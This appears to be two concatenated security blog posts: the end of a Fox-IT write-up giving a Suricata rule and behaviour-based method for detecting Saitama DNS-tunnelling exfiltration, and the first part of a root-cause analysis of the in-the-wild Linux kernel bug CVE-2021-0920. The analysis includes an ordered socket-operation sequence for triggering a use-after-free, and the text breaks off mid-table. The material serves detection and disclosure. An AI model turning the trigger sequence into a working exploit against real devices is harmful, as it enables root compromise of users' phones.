alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT - Trojan - Possible Saitama Exfil Pattern Observed"; flow:stateless; content:"|00 01 00 00 00 00 00 00|"; byte_test:1,>=,0x1c,0,relative; fast_pattern; byte_test:1,<=,0x1f,0,relative; dns_query; content:"."; content:"."; distance:1; content:!"."; distance:1; pcre:"/^(?=[0-9]+[a-z]|[a-z]+[0-9])[a-z0-9]{28,31}\.[^.]+\.[a-z]+$/"; threshold:type both, track by_src, count 50, seconds 3600; classtype:trojan-activity; priority:2; reference:url, https://github.com/fox-it/saitama-server; metadata:ids suricata; sid:21004170; rev:1;)
```

This signature may seem a bit complex, but if we dissect it into separate parts it is intuitive given the previous sections. The choice for 28-31 characters is based on the structure of DNS queries containing output. First, one byte is dedicated to the 'send and receive' command code. Then follows the encoded ID of the implant, which can take between 1 and 3 bytes. Then, 2 bytes are dedicated to the byte index of the output data. This is followed by 20 bytes of base-32 encoded output.
Lastly, the current value for the 'counter' variable will be sent. As this number can range between 0 and 46655, this takes between 1 and 5 bytes.

### Behaviour-based

The randomization that makes it difficult to create signatures is also to the defender's advantage: most benign DNS queries are far from random. As seen in the table below, each hack tool outlined has at least one subdomain that has an encrypted or encoded part. While initially one might opt for measuring entropy to approximate randomness, said technique is less reliable when the input string is short. The usage of N-grams, an approach we have previously written about4, is better suited. Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel, an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries. This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as 'randomized'. The specifics of these bursts differ slightly between tools, but in general there is little or no idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start for determining the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value, and in 50% of the cases there are fewer than 60 queries in an hour. To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution.
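That normal-approximation argument can also be sanity-checked numerically. A small simulation of queries per hour under uniform 40-80 second sleeps (queries_per_hour is a hypothetical helper name):

```python
import random
import statistics

def queries_per_hour(rng, window=3600.0, lo=40.0, hi=80.0):
    # Count the queries that fit in one window when every query is
    # preceded by a uniform random sleep.
    t, n = 0.0, 0
    while True:
        t += rng.uniform(lo, hi)
        if t > window:
            return n
        n += 1

rng = random.Random(1337)
counts = [queries_per_hour(rng) for _ in range(2000)]
print(round(statistics.mean(counts)), min(counts))
```

The simulated hourly counts cluster tightly around 59-60 and essentially never drop near 50, which is consistent with the post's choice of 53 and the extra slack down to "count 50, seconds 3600" in the Suricata rule.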
With this distribution we can calculate the number of queries that results in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance false positives and false negatives. In summary, combining detection of random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and, more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs.

## Conclusion

When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant's behaviour. This can subsequently be used for detection engineering purposes. Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization.
Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.

## Resources

With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions. The server-side implementation of Saitama can be found on the Fox-IT GitHub. This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP.

## References

# The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I)

10 August 2022 at 23:00

A deep dive into an in-the-wild Android exploit

Guest Post by Xingyu Jin, Android Security Research

This is part one of a two-part guest blog post, where first we'll look at the root cause of the CVE-2021-0920 vulnerability. In the second post, we'll dive into the in-the-wild 0-day exploitation of the vulnerability and post-compromise modules.

# Overview of in-the-wild CVE-2021-0920 exploits

A surveillance vendor named Wintego developed an exploit for a Linux socket syscall 0-day, CVE-2021-0920, and used it in the wild since at least November 2020, based on the earliest captured sample, until the issue was fixed in November 2021. Combined with Chrome and Samsung browser exploits, the vendor was able to remotely root Samsung devices. The fix was released with the November 2021 Android Security Bulletin, and applied to Samsung devices in Samsung's December 2021 security update. Google's Threat Analysis Group (TAG) discovered Samsung browser exploit chains being used in the wild. TAG then performed root cause analysis and discovered that this vulnerability, CVE-2021-0920, was being used to escape the sandbox and elevate privileges. CVE-2021-0920 was reported to Linux/Android anonymously.
The Google Android Security Team performed the full deep-dive analysis of the exploit. This issue was initially discovered in 2016 by a Red Hat kernel developer and disclosed in a public email thread, but the Linux kernel community did not patch the issue until it was re-reported in 2021. Various Samsung devices were targeted, including the Samsung S10 and S20. By abusing an ephemeral race condition in Linux kernel garbage collection, the exploit code was able to obtain a use-after-free (UAF) in a kernel sk_buff object. The in-the-wild sample could effectively circumvent CONFIG_ARM64_UAO, achieve arbitrary read/write primitives and bypass Samsung RKP to elevate to root. Other Android devices were also vulnerable, but we did not find any exploit samples against them. Text extracted from captured samples dubbed the vulnerability "quantum Linux kernel garbage collection", which appears to be a fitting title for this blogpost.

# Introduction

CVE-2021-0920 is a use-after-free (UAF) due to a race condition in the garbage collection system for SCM_RIGHTS. SCM_RIGHTS is a control message that allows unix-domain sockets to transmit an open file descriptor from one process to another. In other words, the sender transmits a file descriptor and the receiver then obtains a file descriptor from the sender. This passing of file descriptors adds complexity to reference-counting file structs. To account for this, the Linux kernel community designed a special garbage collection system. CVE-2021-0920 is a vulnerability within this garbage collection system. By winning a race condition during the garbage collection process, an adversary can exploit the UAF on the socket buffer, sk_buff object. In the following sections, we'll explain the SCM_RIGHTS garbage collection system and the details of the vulnerability. The analysis is based on the Linux 4.14 kernel.

## What is SCM_RIGHTS?
Linux developers can share file descriptors (fd) from one process to another using the SCM_RIGHTS datagram with the sendmsg syscall. When a process passes a file descriptor to another process, SCM_RIGHTS will add a reference to the underlying file struct. This means that the process that is sending the file descriptors can immediately close the file descriptor on their end, even if the receiving process has not yet accepted and taken ownership of the file descriptors. When the file descriptors are in the "queued" state (meaning the sender has passed the fd and then closed it, but the receiver has not yet accepted the fd and taken ownership), specialized garbage collection is needed. To track this "queued" state, this LWN article does a great job explaining SCM_RIGHTS reference counting, and it's recommended reading before continuing on with this blogpost.

## Sending

As stated previously, a unix domain socket uses the syscall sendmsg to send a file descriptor to another socket. To explain the reference counting that occurs during SCM_RIGHTS, we'll start from the sender's point of view. We start with the kernel function unix_stream_sendmsg, which implements the sendmsg syscall. To implement the SCM_RIGHTS functionality, the kernel uses the structure scm_fp_list for managing all the transmitted file structures. scm_fp_list stores the list of file pointers to be passed:

```c
struct scm_fp_list {
	short			count;
	short			max;
	struct user_struct	*user;
	struct file		*fp[SCM_MAX_FD];
};
```

unix_stream_sendmsg invokes scm_send (af_unix.c#L1886) to initialize the scm_fp_list structure, linked by the scm_cookie structure on the stack.
```c
struct scm_cookie {
	struct pid		*pid;		/* Skb credentials */
	struct scm_fp_list	*fp;		/* Passed files */
	struct scm_creds	creds;		/* Skb credentials */
#ifdef CONFIG_SECURITY_NETWORK
	u32			secid;		/* Passed security ID */
#endif
};
```

To be more specific, scm_send → __scm_send → scm_fp_copy (scm.c#L68) reads the file descriptors from userspace and initializes scm_cookie->fp, which can contain SCM_MAX_FD file structures. Since the Linux kernel uses the sk_buff (also known as socket buffers or skb) object to manage all types of socket datagrams, the kernel also needs to invoke the unix_scm_to_skb function to link the scm_cookie->fp to a corresponding skb object. This occurs in unix_attach_fds (scm.c#L103):

```c
	/*
	 * Need to duplicate file references for the sake of garbage
	 * collection. Otherwise a socket in the fps might become a
	 * candidate for GC while the skb is not yet queued.
	 */
	UNIXCB(skb).fp = scm_fp_dup(scm->fp);
	if (!UNIXCB(skb).fp)
		return -ENOMEM;
```

The scm_fp_dup call in unix_attach_fds increases the reference count of the file descriptor that's being passed, so the file is still valid even after the sender closes the transmitted file descriptor later:

```c
struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
{
	struct scm_fp_list *new_fpl;
	int i;

	if (!fpl)
		return NULL;

	new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),
			  GFP_KERNEL);
	if (new_fpl) {
		for (i = 0; i < fpl->count; i++)
			get_file(fpl->fp[i]);
		new_fpl->max = new_fpl->count;
		new_fpl->user = get_uid(fpl->user);
	}
	return new_fpl;
}
```

Let's examine a concrete example. Assume we have sockets A and B. Socket A attempts to pass itself to B. After the SCM_RIGHTS datagram is sent, the newly allocated skb from the sender will be appended to B's sk_receive_queue, which stores received datagrams:

sk_buff carries the scm_fp_list structure

The reference count of A is incremented to 2 and the reference count of B is still 1.
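The sending side described above is also visible from userspace. A minimal sketch using Python's socket.send_fds / socket.recv_fds wrappers around sendmsg/recvmsg with SCM_RIGHTS (Python 3.9+, Linux): the sender closes its descriptor immediately after sending, and the underlying file stays alive because the kernel took the extra reference via scm_fp_dup.

```python
import os
import socket

# Pass a pipe's read end over a unix socketpair with SCM_RIGHTS.
a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
r, w = os.pipe()

socket.send_fds(a, [b"x"], [r])  # kernel bumps the file's reference count
os.close(r)                      # sender's fd is gone; the file struct survives

msg, fds, flags, addr = socket.recv_fds(b, 1, 1)
os.write(w, b"hello")
print(os.read(fds[0], 5))        # the received duplicate still reads the pipe
```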
## Receiving

Now, let's take a look at the receiver side in unix_stream_read_generic (we will not discuss the MSG_PEEK flag yet, and focus on the normal routine). First of all, the kernel grabs the current skb from sk_receive_queue using skb_peek. Secondly, since scm_fp_list is attached to the skb, the kernel will call unix_detach_fds (link) to parse the transmitted file structures from the skb and clear the skb from sk_receive_queue:

```c
	/* Mark read part of skb as used */
	if (!(flags & MSG_PEEK)) {
		UNIXCB(skb).consumed += chunk;
		sk_peek_offset_bwd(sk, chunk);

		if (UNIXCB(skb).fp)
			unix_detach_fds(&scm, skb);

		if (unix_skb_len(skb))
			break;

		skb_unlink(skb, &sk->sk_receive_queue);
		consume_skb(skb);

		if (scm.fp)
			break;
```

The function scm_detach_fds iterates over the list of passed file descriptors (scm->fp) and installs the new file descriptors accordingly for the receiver:

```c
	for (i=0, cmfptr=(__force int __user *)CMSG_DATA(cm); i<fdmax;
	     i++, cmfptr++)
	{
		struct socket *sock;
		int new_fd;
		err = security_file_receive(fp[i]);
		if (err)
			break;
		err = get_unused_fd_flags(MSG_CMSG_CLOEXEC & msg->msg_flags
					  ? O_CLOEXEC : 0);
		if (err < 0)
			break;
		new_fd = err;
		err = put_user(new_fd, cmfptr);
		if (err) {
			put_unused_fd(new_fd);
			break;
		}
		/* Bump the usage count and install the file. */
		sock = sock_from_file(fp[i], &err);
		if (sock) {
			sock_update_netprioidx(&sock->sk->sk_cgrp_data);
			sock_update_classid(&sock->sk->sk_cgrp_data);
		}
		fd_install(new_fd, get_file(fp[i]));
	}
```

Once the file descriptors have been installed, __scm_destroy (link) cleans up the allocated scm->fp and decrements the file reference count for every transmitted file structure:

```c
void __scm_destroy(struct scm_cookie *scm)
{
	struct scm_fp_list *fpl = scm->fp;
	int i;

	if (fpl) {
		scm->fp = NULL;
		for (i=fpl->count-1; i>=0; i--)
			fput(fpl->fp[i]);
		free_uid(fpl->user);
		kfree(fpl);
	}
}
```

## Reference Counting and Inflight Counting

As mentioned above, when a file descriptor is passed using SCM_RIGHTS, its reference count is immediately incremented.
Once the recipient socket has accepted and installed the passed file descriptor, the reference count is decremented. The complication comes from the “middle” of this operation: after the file descriptor has been sent, but before the receiver has accepted and installed it. Let’s consider the following scenario:

1. The process creates sockets A and B.
2. A sends socket A to socket B.
3. B sends socket B to socket A.
4. Close A.
5. Close B.

*Figure: scenario for a reference count cycle*

Both sockets are closed prior to accepting the passed file descriptors. The reference counts of A and B are both 1 and can't be further decremented, because the sockets were removed from the kernel fd table when the respective processes closed them. Therefore the kernel is unable to release the two skbs and sock structures, and an unbreakable cycle is formed.

The Linux kernel garbage collection system is designed to prevent memory exhaustion in this particular scenario. The inflight count was implemented to identify potential garbage: each time the reference count is increased because an SCM_RIGHTS datagram is sent, the inflight count is incremented as well. When a file descriptor is sent in an SCM_RIGHTS datagram, the Linux kernel also puts its unix_sock on a global list, gc_inflight_list, and increments unix_tot_inflight, which counts the total number of inflight sockets.
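For illustration, the unbreakable cycle described above can be set up from userspace in a few lines (a sketch; the reference and inflight bookkeeping it triggers is internal to the kernel and not observable from here):

```python
import array
import socket

def send_fd(sock, fd):
    # Pass a single descriptor in an SCM_RIGHTS control message.
    buf = array.array("i", [fd])
    sock.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, buf.tobytes())])

a, b = socket.socketpair()  # 1. create sockets A and B
send_fd(a, a.fileno())      # 2. A sends socket A to socket B
send_fd(b, b.fileno())      # 3. B sends socket B to socket A
a.close()                   # 4. close A
b.close()                   # 5. close B

# At this point the two queued skbs hold the only references to A and B;
# only the kernel garbage collector (unix_gc) can reclaim them.
print(a.fileno(), b.fileno())  # → -1 -1 (both descriptors are closed)
```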
Then, the kernel increments u->inflight, which tracks the inflight count for each individual file descriptor, in the unix_inflight function (scm.c#L45) invoked from unix_attach_fds:

```c
void unix_inflight(struct user_struct *user, struct file *fp)
{
	struct sock *s = unix_get_socket(fp);

	spin_lock(&unix_gc_lock);

	if (s) {
		struct unix_sock *u = unix_sk(s);

		if (atomic_long_inc_return(&u->inflight) == 1) {
			BUG_ON(!list_empty(&u->link));
			list_add_tail(&u->link, &gc_inflight_list);
		} else {
			BUG_ON(list_empty(&u->link));
		}
		unix_tot_inflight++;
	}
	user->unix_inflight++;
	spin_unlock(&unix_gc_lock);
}
```

Thus, here is what the sk_buff looks like when transferring a file descriptor between sockets A and B:

*Figure: the inflight count of A is incremented*

When the socket file descriptor is received on the other side, the unix_sock.inflight count is decremented.

Let’s revisit the reference count cycle scenario from before the close syscalls. This cycle is breakable, because any socket file can still receive the transmitted file and break the reference cycle:

*Figure: breakable cycle before closing A and B*

After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage:

*Figure: unbreakable cycle after closing A and B*

Now, let’s check another example. Assume we have sockets A, B and 𝛼:

1. A sends socket A to socket B.
2. B sends socket B to socket A.
3. B sends socket B to socket 𝛼.
4. 𝛼 sends socket 𝛼 to socket B.
5. Close A.
6. Close B.

*Figure: breakable cycle for A, B and 𝛼*

This cycle is breakable, because we can get the newly installed file descriptor B' from the socket file descriptor 𝛼, and the newly installed file descriptor A' from B'.

## Garbage Collection

A high-level view of garbage collection is available from lwn.net: "If, instead, the two counts are equal, that file structure might be part of an unreachable cycle.
To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set.

At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle."

To be more specific, the SCM_RIGHTS garbage collection system was developed to handle these unbreakable reference cycles. To identify which file descriptors are part of unbreakable cycles:

1. Add any unix_sock objects whose reference count equals their inflight count to the gc_candidates list.
2. Determine whether the socket is referenced by any sockets outside of the gc_candidates list. If it is, it is reachable: remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found.
3. After this iterative process, only sockets that are solely referenced by other sockets within the gc_candidates list remain.

Let’s take a closer look at how this garbage collection process works.
First, the kernel finds all the unix_sock objects whose reference count equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):

```c
	list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
		long total_refs;
		long inflight_refs;

		total_refs = file_count(u->sk.sk_socket->file);
		inflight_refs = atomic_long_read(&u->inflight);

		BUG_ON(inflight_refs < 1);
		BUG_ON(total_refs < inflight_refs);
		if (total_refs == inflight_refs) {
			list_move_tail(&u->link, &gc_candidates);
			__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
			__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
		}
	}
```

Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#L138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue, decreasing the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):

```c
	/* Now remove all internal in-flight reference to children of
	 * the candidates.
	 */
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, dec_inflight, NULL);
```

After iterating through all the candidates, if a gc candidate still has a positive inflight count, it is referenced by objects outside of the gc_candidates list and is therefore reachable. Such candidates should not stay in the gc_candidates list, so the related inflight counts need to be restored. To do this, the kernel puts the candidate on not_cycle_list instead, iterates through the receive queue of each transmitted file in the gc_candidates list (garbage.c#L281), and increments the inflight counts back. The entire process is done recursively, so that the garbage collector avoids purging reachable sockets:

```c
	/* Restore the references for children of all candidates,
	 * which have remaining references. Do this recursively, so
	 * only those remain, which form cyclic references.
	 *
	 * Use a "cursor" link, to make the list traversal safe, even
	 * though elements might be moved about.
	 */
	list_add(&cursor, &gc_candidates);
	while (cursor.next != &gc_candidates) {
		u = list_entry(cursor.next, struct unix_sock, link);

		/* Move cursor to after the current position. */
		list_move(&cursor, &u->link);

		if (atomic_long_read(&u->inflight) > 0) {
			list_move_tail(&u->link, &not_cycle_list);
			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
			scan_children(&u->sk, inc_inflight_move_tail, NULL);
		}
	}
	list_del(&cursor);
```

Now gc_candidates contains only “garbage”. The kernel restores the original inflight counts for gc_candidates, moves the candidates on not_cycle_list back to gc_inflight_list, and invokes __skb_queue_purge to clean up the garbage (garbage.c#L306):

```c
	/* Now gc_candidates contains only garbage. Restore original
	 * inflight counters for these as well, and remove the skbuffs
	 * which are creating the cycle(s).
	 */
	skb_queue_head_init(&hitlist);
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, inc_inflight, &hitlist);

	/* not_cycle_list contains those sockets which do not make up a
	 * cycle. Restore these to the inflight list.
	 */
	while (!list_empty(&not_cycle_list)) {
		u = list_entry(not_cycle_list.next, struct unix_sock, link);
		__clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
		list_move_tail(&u->link, &gc_inflight_list);
	}

	spin_unlock(&unix_gc_lock);

	/* Here we are. Hitlist is filled. Die. */
	__skb_queue_purge(&hitlist);

	spin_lock(&unix_gc_lock);
```

__skb_queue_purge clears every skb from the receive queue:

```c
/**
 *	__skb_queue_purge - empty a list
 *	@list: list to empty
 *
 *	Delete all buffers on an &sk_buff list. Each buffer is removed from
 *	the list and one reference dropped. This function does not take the
 *	list lock and the caller must hold the relevant locks to use it.
 */
void skb_queue_purge(struct sk_buff_head *list);
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
	struct sk_buff *skb;
	while ((skb = __skb_dequeue(list)) != NULL)
		kfree_skb(skb);
}
```

There are two ways to trigger the garbage collection process:

1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets.
2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive: if garbage collection is already in progress, the kernel will not perform another unix_gc invocation.

Now, let’s check an example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

1. Socket f00 sends socket f00 to socket f01.
2. Socket f01 sends socket f01 to socket 𝛼.
3. Close f00.
4. Close f01.

Before starting the garbage collection process, the status of the socket file descriptors is:

• f00: ref = 1, inflight = 1
• f01: ref = 1, inflight = 1
• 𝛼: ref = 1, inflight = 0

*Figure: breakable cycle formed by f00, f01 and 𝛼*

During the garbage collection process, f00 and f01 are considered garbage candidates. The inflight count of f00 drops to zero, but the count of f01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f01’s receive queue. As a result, f00 and f01 are no longer treated as garbage.
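The candidate-reduction logic described above can be modeled outside the kernel. The following toy Python model is illustrative only (the names and data structures are invented, not kernel code): it picks candidates whose reference count equals their inflight count, then iteratively removes any socket that has references coming from outside the candidate set.

```python
def find_garbage(refs, inflight, queues):
    """Toy model of the unix_gc candidate reduction (not kernel code).

    refs[s]     - total reference count of socket s
    inflight[s] - number of SCM_RIGHTS references to s
    queues[s]   - sockets contained in datagrams queued on s
    """
    # Step 1: candidates are sockets whose refcount equals their inflight count.
    cand = {s for s in refs if inflight[s] > 0 and refs[s] == inflight[s]}

    # Step 2: drop any candidate referenced from outside the set,
    # repeating until a fixed point is reached.
    changed = True
    while changed:
        changed = False
        for s in list(cand):
            internal = sum(queues[c].count(s) for c in cand)
            if inflight[s] > internal:  # some reference comes from outside
                cand.discard(s)
                changed = True
    return cand  # Step 3: only unreachable cycles remain

# Unbreakable cycle: A sent to B, B sent to A, both closed.
assert find_garbage(
    refs={"A": 1, "B": 1},
    inflight={"A": 1, "B": 1},
    queues={"A": ["B"], "B": ["A"]},
) == {"A", "B"}

# Breakable case from the text ("a" stands in for 𝛼): f01 is still
# referenced from 𝛼's receive queue, so nothing is garbage.
assert find_garbage(
    refs={"f00": 1, "f01": 1, "a": 1},
    inflight={"f00": 1, "f01": 1, "a": 0},
    queues={"f00": [], "f01": ["f00"], "a": ["f01"]},
) == set()

print("model matches the walkthrough")
```

The kernel achieves the same effect by decrementing and restoring the per-socket inflight counters in place rather than recomputing reference sums, but the fixed point reached is the same.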
## recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. unix_stream_read_generic calls unix_detach_fds to decrement the inflight count, and unix_detach_fds then clears the list of passed file descriptors (scm_fp_list) from the skb:

```c
static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
	int i;

	scm->fp = UNIXCB(skb).fp;
	UNIXCB(skb).fp = NULL;

	for (i = scm->fp->count - 1; i >= 0; i--)
		unix_notinflight(scm->fp->user, scm->fp->fp[i]);
}
```

The unix_notinflight call in unix_detach_fds reverses the effect of unix_inflight by decrementing the inflight count:

```c
void unix_notinflight(struct user_struct *user, struct file *fp)
{
	struct sock *s = unix_get_socket(fp);

	spin_lock(&unix_gc_lock);

	if (s) {
		struct unix_sock *u = unix_sk(s);

		BUG_ON(!atomic_long_read(&u->inflight));
		BUG_ON(list_empty(&u->link));

		if (atomic_long_dec_and_test(&u->inflight))
			list_del_init(&u->link);
		unix_tot_inflight--;
	}
	user->unix_inflight--;
	spin_unlock(&unix_gc_lock);
}
```

Later, skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb) → __kfree_skb, the kernel invokes the function pointer skb->destructor (code), which redirects to unix_destruct_scm:

```c
static void unix_destruct_scm(struct sk_buff *skb)
{
	struct scm_cookie scm;

	memset(&scm, 0, sizeof(scm));
	scm.pid = UNIXCB(skb).pid;
	if (UNIXCB(skb).fp)
		unix_detach_fds(&scm, skb);

	/* Alas, it calls VFS */
	/* So fscking what? fput() had been SMP-safe since the last Summer */
	scm_destroy(&scm);
	sock_wfree(skb);
}
```

In fact, unix_detach_fds will not be invoked again from unix_destruct_scm, because UNIXCB(skb).fp was already cleared by the earlier unix_detach_fds call. Finally, fd_install(new_fd, get_file(fp[i])) in scm_detach_fds is invoked to install the new file descriptor.
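The consuming behavior of a normal receive can be observed from userspace (a sketch): once a non-MSG_PEEK recvmsg has processed the skb carrying the descriptors, a subsequent receive returns no further SCM_RIGHTS ancillary data.

```python
import array
import os
import socket

a, b = socket.socketpair()
r, w = os.pipe()

# First datagram carries a descriptor; the second carries none.
fds = array.array("i", [r])
a.sendmsg([b"1"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds.tobytes())])
a.sendmsg([b"2"])

# A normal receive consumes the skb together with its scm_fp_list.
msg1, anc1, _, _ = b.recvmsg(1, socket.CMSG_SPACE(4))
msg2, anc2, _, _ = b.recvmsg(1, socket.CMSG_SPACE(4))

print(len(anc1), len(anc2))  # → 1 0
```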
## recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, while the data is treated as unread. unix_stream_read_generic invokes scm_fp_dup instead of unix_detach_fds, which increases the reference count of the inflight file (af_unix.c#2149):

```c
		/* It is questionable, see note in unix_dgram_recvmsg.
		 */
		if (UNIXCB(skb).fp)
			scm.fp = scm_fp_dup(UNIXCB(skb).fp);

		sk_peek_offset_fwd(sk, chunk);

		if (UNIXCB(skb).fp)
			break;
```

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver still gets a new file descriptor for the inflight socket.

## recvmsg Examples

Let’s look at a concrete example. Assume there are the following socket pairs:

• f00, f01
• f10, f11

Now, the program does the following operations:

• f00 → [f00] → f01 (meaning f00 sends [f00] to f01)
• f10 → [f00] → f11
• Close(f00)

*Figure: breakable cycle formed by f00, f01, f10 and f11*

Here is the status:

• inflight(f00) = 2, ref(f00) = 2
• inflight(f01) = 0, ref(f01) = 1
• inflight(f10) = 0, ref(f10) = 1
• inflight(f11) = 0, ref(f11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f00 as a garbage candidate. However, f00 will not have its inflight count altered, and the kernel will not purge any garbage.

If f01 then calls recvmsg with the MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f01 gets a new file descriptor f00', which increments the reference count of f00:

*Figure: MSG_PEEK increments the reference count of f00 while the receive queue is not cleared*

Status:

• inflight(f00) = 2, ref(f00) = 3
• inflight(f01) = 0, ref(f01) = 1
• inflight(f10) = 0, ref(f10) = 1
• inflight(f11) = 0, ref(f11) = 1

Then, f01 calls recvmsg without the MSG_PEEK flag, and f01’s receive queue is removed.
f01 also fetches a new file descriptor f00'':

*Figure: the receive queue of f01 is cleared and f00'' is obtained from f01*

Status:

• inflight(f00) = 1, ref(f00) = 3
• inflight(f01) = 0, ref(f01) = 1
• inflight(f10) = 0, ref(f10) = 1
• inflight(f11) = 0, ref(f11) = 1

## UAF Scenario

From a very high-level perspective, the internal state of the Linux garbage collector can become non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition in which the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during a MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate and free the socket buffer while a receiver is installing the file descriptor, leading to a UAF on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (a simplified version; in reality more threads may need to work together, but this demonstrates the core idea). First of all, the sample allocates the following socket pairs and a single socket 𝛼:

• f00, f01
• f10, f11
• f20, f21
• f30, f31
• sock 𝛼 (in reality there might be thousands of 𝛼 sockets, used to prolong the garbage collection process in order to evade a BUG_ON check introduced later)

Now, the program does the following operations. Close these file descriptors prior to any recvmsg calls:

• Close(f00)
• Close(f01)
• Close(f11)
• Close(f10)
• Close(f30)
• Close(f31)
• Close(𝛼)

Here is the status:

• inflight(f00) = N + 1, ref(f00) = N + 1
• inflight(f01) = 2, ref(f01) = 2
• inflight(f10) = 3, ref(f10) = 3
• inflight(f11) = 1, ref(f11) = 1
• inflight(f20) = 0, ref(f20) = 1
• inflight(f21) = 0, ref(f21) = 1
• inflight(f31) = 1, ref(f31) = 1
• inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel performs the following scrutiny:

• List f00, f01, f10, f11, f31, 𝛼 as garbage candidates. Decrease the inflight count for the candidate children in each receive queue.
• Since f21 is not considered a candidate, f11’s inflight count is still above zero.
• Recursively restore the inflight counts.
• Nothing is considered garbage.

A potential skb UAF by race condition can be triggered as follows:

1. Call recvmsg with the MSG_PEEK flag from f21 to get f11'.
2. Call recvmsg with the MSG_PEEK flag from f11 to get f10'.
3. Concurrently do the following operations:
   1. Call recvmsg without the MSG_PEEK flag from f11 to get f10''.
   2. Call recvmsg with the MSG_PEEK flag from f10'.

How is this possible? Let’s first see a case where the race condition is not hit, so there is no UAF:

| Thread 0 | Thread 1 | Thread 2 |
| --- | --- | --- |
| Call unix_gc. | | |
| Stage 0: list f00, f01, f10, f11, f31, 𝛼 as garbage candidates. | | |
| | Call recvmsg with MSG_PEEK flag from f21 to get f11'. Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp); | |
| Stage 0: decrease the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0. | | |
| Stage 1: recursively restore the inflight count if a candidate still has a positive inflight count. All inflight counts have been restored. | | |
